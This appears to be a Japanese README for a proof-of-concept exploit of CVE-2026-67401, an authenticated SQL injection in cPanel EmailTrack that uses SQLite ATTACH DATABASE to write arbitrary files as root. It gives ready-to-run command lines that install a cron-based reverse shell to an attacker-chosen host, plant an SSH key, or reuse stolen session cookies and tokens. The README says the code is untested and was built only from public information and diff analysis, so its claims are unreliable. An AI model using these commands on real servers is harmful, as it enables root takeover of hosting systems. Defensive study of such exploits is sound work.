
Python製のCVE-2026-67401の概念実証コード。cPanel EmailTrackにおける認証済みSQLインジェクションで、SQLiteのATTACH DATABASEを介してroot権限で任意のファイル書き込みを可能にし、リバースシェルやSSHキーの設置を実現します。
cPanel EmailTrack における SQL インジェクション。メール権限を持つ認証済み cPanel ユーザーが、SQLite の ATTACH DATABASE を介して root として任意のファイルを書き込めます。root 到達までに必要なリクエストは 1 回です。実環境でのテストは未実施で、コードは公開情報と基本的な差分解析のみから組み立てられています。研究者として十分な調査を行い、試した上で PR による修正を送ってください。
2026年9月8日のパッチ以前のすべての cPanel/WHM ビルドに影響します。
requests ライブラリ# cron 経由のリバースシェル
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# SSH キーの設置
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# 既存セッション
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# ドライラン(リクエストを表示のみ、送信しない)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1